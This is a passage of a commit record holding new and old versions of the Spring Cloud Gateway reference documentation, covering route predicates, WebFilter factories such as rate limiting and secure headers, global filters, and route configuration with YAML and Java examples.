WebFilter Factory takes three parameters: `replenishRate`, `burstCapacity` & `keyResolverName`.\n\n`replenishRate` is how many requests per second do you want a user to be allowed to do.\n\n`burstCapacity` TODO: document burst capacity\n\n`keyResolverName` is the name of a bean that implements the `KeyResolver` interface.\n\n.KeyResolver.java\n[source,java]\n----\npublic interface KeyResolver {\n\tMono<String> resolve(ServerWebExchange exchange);\n}\n----\n\nThe `KeyResolver` interface allows pluggable strategies to derive the key for limiting requests. In future milestones, there will be some `KeyResolver` implementations.\n\nThe redis implementation is based off of work done at https:\/\/stripe.com\/blog\/rate-limiters[Stripe]. It requires the use of the `spring-boot-starter-data-redis-reactive` Spring Boot starter.\n\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: requestratelimiter_route\n uri: http:\/\/example.org\n filters:\n - RequestRateLimiter=10, 20, userKeyResolver\n----\n\n.Config.java\n[source,java]\n----\n@Bean\nKeyResolver userKeyResolver() {\n return exchange -> Mono.just(exchange.getRequest().getQueryParams().getFirst(\"user\"));\n}\n----\n\nThis defines a request rate limit of 10 per user. The `KeyResolver` is a simple one that gets the `user` request parameter (note: this is not recommended for production).\n\n=== RedirectTo WebFilter Factory\nThe RedirectTo WebFilter Factory takes a `status` and a `url` parameter. The status should be a 300 series redirect http code, such as 301. The url should be a valid url. This will be the value of the `Location` header.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - RedirectTo=302, http:\/\/acme.org\n----\n\nThis will send a status 302 with a `Location:http:\/\/acme.org` header to perform a redirect.\n\n=== RemoveNonProxyHeaders WebFilter Factory\nThe RemoveNonProxyHeaders WebFilter Factory removes headers from forwarded requests. The default list of headers that is removed comes from the https:\/\/tools.ietf.org\/html\/draft-ietf-httpbis-p1-messaging-14#section-7.1.3[IETF].\n\n.The default removed headers are:\n * Connection\n * Keep-Alive\n * Proxy-Authenticate\n * Proxy-Authorization\n * TE\n * Trailer\n * Transfer-Encoding\n * Upgrade\n\nTo change this, set the `spring.cloud.gateway.filter.remove-non-proxy-headers.headers` property to the list of header names to remove.\n\n=== RemoveRequestHeader WebFilter Factory\nThe RemoveRequestHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removerequestheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveRequestHeader=X-Request-Foo\n----\n\nThis will remove the `X-Request-Foo` header before it is sent downstream.\n\n=== RemoveResponseHeader WebFilter Factory\nThe RemoveResponseHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removeresponseheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveResponseHeader=X-Response-Foo\n----\n\nThis will remove the `X-Response-Foo` header from the response before it is returned to the gateway client.\n\n=== RewritePath WebFilter Factory\nThe RewritePath WebFilter Factory takes a path `regexp` parameter and a `replacement` parameter. This uses Java regular expressions for a flexible way to rewrite the request path.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: rewritepath_route\n uri: http:\/\/example.org\n - Path=\/foo\/**\n filters:\n - RewritePath=\/foo\/(?<segment>.*), \/$\\{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request. Notice the `$\\` which is replaced with `$` because of the YAML spec.\n\n=== SecureHeaders WebFilter Factory\nThe SecureHeaders WebFilter Factory adds a number of headers to the response at the reccomendation from https:\/\/blog.appcanary.com\/2017\/http-security-headers.html[this blog post].\n\n.The following headers are added (allong with default values):\n * `X-Xss-Protection:1; mode=block`\n * `Strict-Transport-Security:max-age=631138519`\n * `X-Frame-Options:DENY`\n * `X-Content-Type-Options:nosniff`\n * `Referrer-Policy:no-referrer`\n * `Content-Security-Policy:default-src 'self' https:; font-src 'self' https: data:; img-src 'self' https: data:; object-src 'none'; script-src https:; style-src 'self' https: 'unsafe-inline'`\n * `X-Download-Options:noopen`\n * `X-Permitted-Cross-Domain-Policies:none`\n\nTo change the default values set the appropriate property in the `spring.cloud.gateway.filter.secure-headers` namespace:\n\n.Property to change:\n * `xss-protection-header`\n * `strict-transport-security`\n * `frame-options`\n * `content-type-options`\n * `referrer-policy`\n * `content-security-policy`\n * `download-options`\n * `permitted-cross-domain-policies`\n\n\n=== SetPath WebFilter Factory\nThe SetPath WebFilter Factory takes a path `template` parameter. It offers a simple way to manipulate the request path by allowing templated segments of the path. This uses the uri templates from Spring Framework. Multiple matching segments are allowed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setpath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n filters:\n - SetPath=\/{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request.\n\n=== SetResponseHeader WebFilter Factory\nThe SetResponseHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setresponseheader_route\n uri: http:\/\/example.org\n filters:\n - SetResponseHeader=X-Response-Foo, Bar\n----\n\nThis WebFilter replaces all headers with the given name, rather than adding. So if the downstream server responded with a `X-Response-Foo:1234`, this would be replaced with `X-Response-Foo:Bar`, which is what the gateway client would receive.\n\n=== SetStatus WebFilter Factory\nThe SetStatus WebFilter Factory takes a single `status` parameter. It must be a valid Spring `HttpStatus`. It may be the integer value `404` or the string representation of the enumeration `NOT_FOUND`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatusstring_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=BAD_REQUEST\n - id: setstatusint_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nIn either case, the HTTP status of the response will be set to 401.\n\n== Global Filters\n\nThe `GlobalFilter` interface has the same signature as `WebFilter`. These are special filters that are conditionally applied to all routes. (This interface and usage are subject to change in future milestones).\n\n=== LoadBalancerClient Filter\n\nThe `LoadBalancerClientFilter` looks for a URI in the exchange attribute `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR`. If the url has a `lb` scheme (ie `lb:\/\/myservice`), it will use the Spring Cloud `LoadBalancerClient` to resolve the name (`myservice` in the previous example) to an actual host and port and replace the URI in the same attribute. The unmodified original url is placed in the `ServerWebExchangeUtils.GATEWAY_ORIGINAL_REQUEST_URL_ATTR` attribute.\n\n=== Netty Routing Filter\n\nThe Netty Routing Filter runs if the url located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `http` or `https` scheme. It uses the Netty `HttpClient` to make the downstream proxy request. The response is put in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute for use in a later filter. (There is an experimental `WebClientHttpRoutingFilter` that performs the same function, but does not require netty)\n\n=== Netty Write Response Filter\n\nThe `NettyWriteResponseFilter` runs if there is a Netty `HttpClientResponse` in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute. It is run after all other filters have completed and writes the proxy response back to the gateway client response. (There is an experimental `WebClientWriteResponseFilter` that performs the same function, but does not require netty)\n\n=== RouteToRequestUrl Filter\n\nThe `RouteToRequestUrlFilter` runs if there is a `Route` object in the `ServerWebExchangeUtils.GATEWAY_ROUTE_ATTR` exchange attribute. It creates a new URI, based off of the request URI, but updated with the URI attribute of the `Route` object. The new URI is placed in the ``ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute`.\n\n=== Websocket Routing Filter\n\nThe Websocket Routing Filter runs if the url located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `ws` or `wss` scheme. It uses the Spring Web Socket infrastructure to forward the Websocket request downstream.\n\n== Configuration\n\nConfiguration for Spring Cloud Gateway is driven by a collection of `RouteDefinitionLocator`s.\n\n.RouteDefinitionLocator.java\n[source,java]\n----\npublic interface RouteDefinitionLocator {\n\tFlux<RouteDefinition> getRouteDefinitions();\n}\n----\n\nBy default, a `PropertiesRouteDefinitionLocator` loads properties using Spring Boot's `@ConfigurationProperties` mechanism.\n\nThe configuration examples above all use a shortcut notation that uses positional arguments rather than named ones. The two examples below are equivalent:\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatus_route\n uri: http:\/\/example.org\n filters:\n - name: SetStatus\n args:\n status: 401\n - id: setstatusshortcut_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nFor some usages of the gateway, properties will be adequate, but some production use cases will benefit from loading configuration from an external source, such as a database. Future milestone versions will have `RouteDefinitionLocator` implementations based off of Spring Data Repositories such as: Redis, MongoDB and Cassandra.\n\n=== Fluent Java Routes API\nTo allow for simple configuration in Java, there is a fluent API defined in the `Routes` class.\n\n.Config.java\n[source,java]\n----\n\/\/ static imports from WebFilterFactories and RoutePredicates\n@Bean\npublic RouteLocator customRouteLocator(ThrottleWebFilterFactory throttle) {\n return Routes.locator()\n .route(\"test\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(host(\"**.abc.org\").and(path(\"\/image\/png\")))\n .addResponseHeader(\"X-TestHeader\", \"foobar\")\n .and()\n .route(\"test2\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(path(\"\/image\/webp\"))\n .add(addResponseHeader(\"X-AnotherHeader\", \"baz\"))\n .and()\n .build();\n}\n----\n\nThis style also allows for more custom predicate assertions. The predicates defined by `RouteDefinitionLocator` beans are combined using logical `and`. By using the fluent Java API, you can use the `and()`, `or()` and `negate()` operators on the `Predicate` class.\n\n== Actuator API\n\nTODO: document the `\/gateway` actuator endpoint\n\n== Developer Guide\n\nTODO: overview of writing custom integrations\n\n=== Writing Custom Route Predicate Factorys\n\nTODO: document writing Custom Route Predicate Factorys\n\n=== Writing Custom WebFilter Factorys\n\nTODO: document writing Custom WebFilter Factorys\n\n=== Writing Custom Global Filters\n\nTODO: document writing Custom Global Filters\n\n=== Writing Custom Route Locators and Writers\n\nTODO: document writing Custom Route Locators and Writers\n\n== Building a Simple Gateway Using Spring MVC\n\nSpring Cloud Gateway provides a utility object called `ProxyExchange` which you can use inside a regular Spring MVC handler as a method parameter. It supports basic downstream HTTP exchanges via methods that mirror the HTTP verbs, or forwarding to a local handler via the `forward()` method.\n\nExample (proxying a request to \"\/test\" downstream to a remote server):\n\n```java\n@RestController\n@SpringBootApplication\npublic class GatewaySampleApplication {\n\n\t@Value(\"${remote.home}\")\n\tprivate URI home;\n\n\t@GetMapping(\"\/test\")\n\tpublic ResponseEntity<?> proxy(ProxyExchange<Object> proxy) throws Exception {\n\t\treturn proxy.uri(home.toString() + \"\/image\/png\").get();\n\t}\n\n}\n```\n\nThere are convenience methods on the `ProxyExchange` to enable the handler method to discover and enhance the URI path of the incoming request. For example you might want to extract the trailing elements of a path to pass them downstream:\n\n```java\n@GetMapping(\"\/proxy\/path\/**\")\npublic ResponseEntity<?> proxyPath(ProxyExchange<?> proxy) throws Exception {\n String path = proxy.path(\"\/proxy\/path\/\");\n return proxy.uri(home.toString() + \"\/foos\/\" + path).get();\n}\n```\n\nAll the features of Spring MVC are available to Gateway handler methods. So you can inject request headers and query parameters, for instance, and you can constrain the incoming requests with declarations in the mapping annotation. See the documentation for `@RequestMapping` in Spring MVC for more details of those features.\n\nHeaders can be added to the downstream response using the `header()` methods on `ProxyExchange`.\n\nYou can also manipulate response headers (and anything else you like in the response) by adding a mapper to the `get()` etc. method. The mapper is a `Function` that takes the incoming `ResponseEntity` and converts it to an outgoing one.\n\nFirst class support is provided for \"sensitive\" headers (\"cookie\" and \"authorization\" by default) which are not passed downstream, and for \"proxy\" headers (`x-forwarded-*`).\n","old_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-gateway\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n:nofooter:\n:imagesdir: .\/images\n:imagesurl: {github-raw}\/docs\/src\/main\/asciidoc\/images\n= Spring Cloud Gateway\n\n*{spring-cloud-version}*\n\ninclude::intro.adoc[]\n\n[[gateway-starter]]\n== How to Include Spring Cloud Gateway\n\nTo include Spring Cloud Gateway in your project use the starter with group `org.springframework.cloud`\nand artifact id `spring-cloud-starter-gateway`. See the http:\/\/projects.spring.io\/spring-cloud\/[Spring Cloud Project page]\nfor details on setting up your build system with the current Spring Cloud Release Train.\n\nIf you include the starter, but, for some reason, you do not want the gateway to be enabled, set `spring.cloud.gateway.enabled=false`.\n\n== Glossary\n\n* *Route*: Route the basic building block of the gateway. It is defined by an ID, a destination URI, a collection of predicates and a collection of filters. A route is matched if aggregate predicate is true.\n* *Predicate*: This is a http:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/function\/Predicate.html[Java 8 Function Predicate]. The input type is a http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/ServerWebExchange.html[Spring Framework `ServerWebExchange`]. This allows developers to match on anything from the HTTP request, such as headers or parameters.\n* *Filter*: These are instances http:\/\/docs.spring.io\/spring\/docs\/5.0.x\/javadoc-api\/org\/springframework\/web\/server\/WebFilter.html[Spring Framework `WebFilter`] constructed in with a specific factory. Here, requests and responses can be modified before or after sending the downstream request.\n\n[[gateway-how-it-works]]\n== How It Works\n\nimage::{imagesurl}\/spring_cloud_gateway_diagram.png[Spring Cloud Gateway Diagram]\n\nClients make requests to Spring Cloud Gateway. If the Gateway Handler Mapping determines that a request matches a Route, it is sent to the Gateway Web Handler. This handler runs sends the request through a filter chain that is specific to the request. The reason the filters are divided by the dotted line, is that filters may execute logic before the proxy request is sent or after. All \"pre\" filter logic is executed, then the proxy request is made. After the proxy request is made, the \"post\" filter logic is executed.\n\n[[gateway-request-predicates-factories]]\n== Route Predicate Factories\n\nSpring Cloud Gateway matches routes as part of the Spring WebFlux `HandlerMapping` infrastructure. Spring Cloud Gateway includes many built-in Route Predicate Factorys. All of these predicates match on different attributes of the HTTP request. Multiple Route Predicate Factorys can be combined and are combined via logical `and`.\n\n=== After Route Predicate Factory\nThe After Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen after the current datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: after_route\n uri: http:\/\/example.org\n predicates:\n - After=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Before Route Predicate Factory\nThe Before Route Predicate Factory takes one parameter, a datetime. This predicate matches requests that happen before the current datetime.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: before_route\n uri: http:\/\/example.org\n predicates:\n - Before=2017-01-20T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request before Jan 20, 2017 17:42 Mountain Time (Denver).\n\n=== Between Route Predicate Factory\nThe Between Route Predicate Factory takes two parameters, datetime1 and datetime2. This predicate matches requests that happen after datetime1 and before datetime2. The datetime2 parameter must be after datetime1.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: between_route\n uri: http:\/\/example.org\n predicates:\n - Betweeen=2017-01-20T17:42:47.789-07:00[America\/Denver], 2017-01-21T17:42:47.789-07:00[America\/Denver]\n----\n\nThis route matches any request after Jan 20, 2017 17:42 Mountain Time (Denver) and before Jan 21, 2017 17:42 Mountain Time (Denver). This could be useful for maintenance windows.\n\n=== Cookie Route Predicate Factory\nThe Cookie Route Predicate Factory takes two parameters, the cookie name and a regular expression. This predicate matches cookies that have the given name and the value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: cookie_route\n uri: http:\/\/example.org\n predicates:\n - Cookie=chocolate, ch.p\n----\n\nThis route matches the request has a cookie named `chocolate` who's value matches the `ch.p` regular expression.\n\n=== Header Route Predicate Factory\nThe Header Route Predicate Factory takes two parameters, the header name and a regular expression. This predicate matches with a header that has the given name and the value matches the regular expression.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: header_route\n uri: http:\/\/example.org\n predicates:\n - Header=X-Request-Id, \\d+\n----\n\nThis route matches if the request has a header named `X-Request-Id` whos value matches the `\\d+` regular expression (has a value of one or more digits).\n\n=== Host Route Predicate Factory\nThe Host Route Predicate Factory takes one parameter: the host name pattern. The pattern is an Ant style pattern with `.` as the separator. This predicates matches the `Host` header that matches the pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Host=**.somehost.org\n----\n\nThis route would match if the request has a `Host` header has the value `www.somehost.org` or `beta.somehost.org`.\n\n\n=== Method Route Predicate Factory\nThe Method Route Predicate Factory takes one parameter: the HTTP method to match.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: method_route\n uri: http:\/\/example.org\n predicates:\n - Method=GET\n----\n\nThis route would match if the request method was a `GET`.\n\n=== Path Route Predicate Factory\nThe Path Route Predicate Factory takes one parameter: a Spring `PathMatcher` pattern.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: host_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n----\n\nThis route would match if the request path was, for example: `\/foo\/1` or `\/foo\/bar`.\n\nThis predicate extracts the URI template variables (like `segment` defined in the example above) as a map of names and values and places it in the `ServerWebExchange.getAttributes()` with a key defined in `PathRoutePredicate.URL_PREDICATE_VARS_ATTR`. Those values are then available for use by <<gateway-route-filters,WebFilter Factorys>>\n\n=== Query Route Predicate Factory\nThe Query Route Predicate Factory takes two parameters: a required `param` and an optional `regexp`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=baz\n----\n\nThis route would match if the request contained a `baz` query parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: query_route\n uri: http:\/\/example.org\n predicates:\n - Query=foo, ba.\n----\n\nThis route would match if the request contained a `foo` query parameter whose value matched the `ba.` regexp, so `bar` and `baz` would match.\n\n\n=== RemoteAddr Route Predicate Factory\nThe RemoteAddr Route Predicate Factory takes a list (min size 1) of CIDR-notation strings, e.g. `192.168.0.1\/16` (where `192.168.0.1` is an IP address and `16` is a subnet mask.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: remoteaddr_route\n uri: http:\/\/example.org\n predicates:\n - RemoteAddr=192.168.1.1\/24\n----\n\nThis route would match if the remote address of the request was, for example, `192.168.1.10`.\n\n[[gateway-route-filters]]\n== WebFilter Factorys\n\nRoute filters allow the modification of the incoming HTTP request or outgoing HTTP response in some manner. Route filters are scoped to a particular route. Spring Cloud Gateway includes many built-in WebFilter Factories.\n\n=== AddRequestHeader WebFilter Factory\nThe AddRequestHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddRequestHeader=X-Request-Foo, Bar\n----\n\nThis will add `X-Request-Foo:Bar` header to the downstream request's headers for all matching requests.\n\n=== AddRequestParameter WebFilter Factory\nThe AddRequestParameter WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_parameter_route\n uri: http:\/\/example.org\n filters:\n - AddRequestParameter=foo, bar\n----\n\nThis will add `foo=bar` to the downstream request's query string for all matching requests.\n\n=== AddResponseHeader WebFilter Factory\nThe AddResponseHeader WebFilter Factory takes a name and value parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: add_request_header_route\n uri: http:\/\/example.org\n filters:\n - AddResponseHeader=X-Response-Foo, Bar\n----\n\nThis will add `X-Response-Foo:Bar` header to the downstream response's headers for all matching requests.\n\n=== Hystrix WebFilter Factory\nThe Hystrix WebFilter Factory takes a single `name` parameters, which is the name of the `HystrixCommand`. (More options might be added in future releases).\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: hytstrix_route\n uri: http:\/\/example.org\n filters:\n - Hystrix=myCommandName\n----\n\nThis wraps the remaining filters in a `HystrixCommand` with command name `myCommandName`.\n\n=== PrefixPath WebFilter Factory\nThe PrefixPath WebFilter Factory takes a single `prefix` parameter.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - PrefixPath=\/mypath\n----\n\nThis will prefix `\/mypath` to the path of all matching requests. So a request to `\/hello`, would be sent to `\/mypath\/hello`.\n\n=== RequestRateLimiter WebFilter Factory\n\nThe RequestRateLimiter WebFilter Factory takes three parameters: `replenishRate`, `burstCapacity` & `keyResolverName`.\n\n`replenishRate` is how many requests per second do you want a user to be allowed to do.\n\n`burstCapacity` TODO: document burst capacity\n\n`keyResolverName` is the name of a bean that implements the `KeyResolver` interface.\n\n.KeyResolver.java\n[source,java]\n----\npublic interface KeyResolver {\n\tMono<String> resolve(ServerWebExchange exchange);\n}\n----\n\nThe `KeyResolver` interface allows pluggable strategies to derive the key for limiting requests. In future milestones, there will be some `KeyResolver` implementations.\n\nThe redis implementation is based off of work done at https:\/\/stripe.com\/blog\/rate-limiters[Stripe]. It requires the use of the `spring-boot-starter-data-redis-reactive` Spring Boot starter.\n\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: requestratelimiter_route\n uri: http:\/\/example.org\n filters:\n - RequestRateLimiter=10, 20, userKeyResolver\n----\n\n.Config.java\n[source,java]\n----\n@Bean\nKeyResolver userKeyResolver() {\n return exchange -> Mono.just(exchange.getRequest().getQueryParams().getFirst(\"user\"));\n}\n----\n\nThis defines a request rate limit of 10 per user. The `KeyResolver` is a simple one that gets the `user` request parameter (note: this is not recommended for production).\n\n=== RedirectTo WebFilter Factory\nThe RedirectTo WebFilter Factory takes a `status` and a `url` parameter. The status should be a 300 series redirect http code, such as 301. The url should be a valid url. This will be the value of the `Location` header.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: prefixpath_route\n uri: http:\/\/example.org\n filters:\n - RedirectTo=302, http:\/\/acme.org\n----\n\nThis will send a status 302 with a `Location:http:\/\/acme.org` header to perform a redirect.\n\n=== RemoveNonProxyHeaders WebFilter Factory\nThe RemoveNonProxyHeaders WebFilter Factory removes headers from forwarded requests. The default list of headers that is removed comes from the https:\/\/tools.ietf.org\/html\/draft-ietf-httpbis-p1-messaging-14#section-7.1.3[IETF].\n\n.The default removed headers are:\n * Connection\n * Keep-Alive\n * Proxy-Authenticate\n * Proxy-Authorization\n * TE\n * Trailer\n * Transfer-Encoding\n * Upgrade\n\nTo change this, set the `spring.cloud.gateway.filter.remove-non-proxy-headers.headers` property to the list of header names to remove.\n\n=== RemoveRequestHeader WebFilter Factory\nThe RemoveRequestHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removerequestheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveRequestHeader=X-Request-Foo\n----\n\nThis will remove the `X-Request-Foo` header before it is sent downstream.\n\n=== RemoveResponseHeader WebFilter Factory\nThe RemoveResponseHeader WebFilter Factory takes a `name` parameter. It is the name of the header to be removed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: removeresponseheader_route\n uri: http:\/\/example.org\n filters:\n - RemoveResponseHeader=X-Response-Foo\n----\n\nThis will remove the `X-Response-Foo` header from the response before it is returned to the gateway client.\n\n=== RewritePath WebFilter Factory\nThe RewritePath WebFilter Factory takes a path `regexp` parameter and a `replacement` parameter. This uses Java regular expressions for a flexible way to rewrite the request path.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: rewritepath_route\n uri: http:\/\/example.org\n - Path=\/foo\/**\n filters:\n - RewritePath=\/foo\/(?<segment>.*), \/$\\{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request. Notice the `$\\` which is replaced with `$` because of the YAML spec.\n\n=== SecureHeaders WebFilter Factory\nThe SecureHeaders WebFilter Factory adds a number of headers to the response at the reccomendation from https:\/\/blog.appcanary.com\/2017\/http-security-headers.html[this blog post].\n\n.The following headers are added (allong with default values):\n * `X-Xss-Protection:1; mode=block`\n * `Strict-Transport-Security:max-age=631138519`\n * `X-Frame-Options:DENY`\n * `X-Content-Type-Options:nosniff`\n * `Referrer-Policy:no-referrer`\n * `Content-Security-Policy:default-src 'self' https:; font-src 'self' https: data:; img-src 'self' https: data:; object-src 'none'; script-src https:; style-src 'self' https: 'unsafe-inline'`\n * `X-Download-Options:noopen`\n * `X-Permitted-Cross-Domain-Policies:none`\n\nTo change the default values set the appropriate property in the `spring.cloud.gateway.filter.secure-headers` namespace:\n\n.Property to change:\n * `xss-protection-header`\n * `strict-transport-security`\n * `frame-options`\n * `content-type-options`\n * `referrer-policy`\n * `content-security-policy`\n * `download-options`\n * `permitted-cross-domain-policies`\n\n\n=== SetPath WebFilter Factory\nThe SetPath WebFilter Factory takes a path `template` parameter. It offers a simple way to manipulate the request path by allowing templated segments of the path. This uses the uri templates from Spring Framework. Multiple matching segments are allowed.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setpath_route\n uri: http:\/\/example.org\n predicates:\n - Path=\/foo\/{segment}\n filters:\n - SetPath=\/{segment}\n----\n\nFor a request path of `\/foo\/bar`, this will set the path to `\/bar` before making the downstream request.\n\n=== SetResponseHeader WebFilter Factory\nThe SetResponseHeader WebFilter Factory takes `name` and `value` parameters.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setresponseheader_route\n uri: http:\/\/example.org\n filters:\n - SetResponseHeader=X-Response-Foo, Bar\n----\n\nThis WebFilter replaces all headers with the given name, rather than adding. So if the downstream server responded with a `X-Response-Foo:1234`, this would be replaced with `X-Response-Foo:Bar`, which is what the gateway client would receive.\n\n=== SetStatus WebFilter Factory\nThe SetStatus WebFilter Factory takes a single `status` parameter. It must be a valid Spring `HttpStatus`. It may be the integer value `404` or the string representation of the enumeration `NOT_FOUND`.\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatusstring_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=BAD_REQUEST\n - id: setstatusint_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nIn either case, the HTTP status of the response will be set to 401.\n\n== Global Filters\n\nThe `GlobalFilter` interface has the same signature as `WebFilter`. These are special filters that are conditionally applied to all routes. (This interface and usage are subject to change in future milestones).\n\n=== LoadBalancerClient Filter\n\nThe `LoadBalancerClientFilter` looks for a URI in the exchange attribute `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR`. If the url has a `lb` scheme (ie `lb:\/\/myservice`), it will use the Spring Cloud `LoadBalancerClient` to resolve the name (`myservice` in the previous example) to an actual host and port and replace the URI in the same attribute. The unmodified original url is placed in the `ServerWebExchangeUtils.GATEWAY_ORIGINAL_REQUEST_URL_ATTR` attribute.\n\n=== Netty Routing Filter\n\nThe Netty Routing Filter runs if the url located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `http` or `https` scheme. It uses the Netty `HttpClient` to make the downstream proxy request. The response is put in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute for use in a later filter. (There is an experimental `WebClientHttpRoutingFilter` that performs the same function, but does not require netty)\n\n=== Netty Write Response Filter\n\nThe `NettyWriteResponseFilter` runs if there is a Netty `HttpClientResponse` in the `ServerWebExchangeUtils.CLIENT_RESPONSE_ATTR` exchange attribute. It is run after all other filters have completed and writes the proxy response back to the gateway client response. (There is an experimental `WebClientWriteResponseFilter` that performs the same function, but does not require netty)\n\n=== RouteToRequestUrl Filter\n\nThe `RouteToRequestUrlFilter` runs if there is a `Route` object in the `ServerWebExchangeUtils.GATEWAY_ROUTE_ATTR` exchange attribute. It creates a new URI, based off of the request URI, but updated with the URI attribute of the `Route` object. The new URI is placed in the ``ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute`.\n\n=== Websocket Routing Filter\n\nThe Websocket Routing Filter runs if the url located in the `ServerWebExchangeUtils.GATEWAY_REQUEST_URL_ATTR` exchange attribute has a `ws` or `wss` scheme. It uses the Spring Web Socket infrastructure to forward the Websocket request downstream.\n\n== Configuration\n\nConfiguration for Spring Cloud Gateway is driven by a collection of `RouteDefinitionLocator`s.\n\n.RouteDefinitionLocator.java\n[source,java]\n----\npublic interface RouteDefinitionLocator 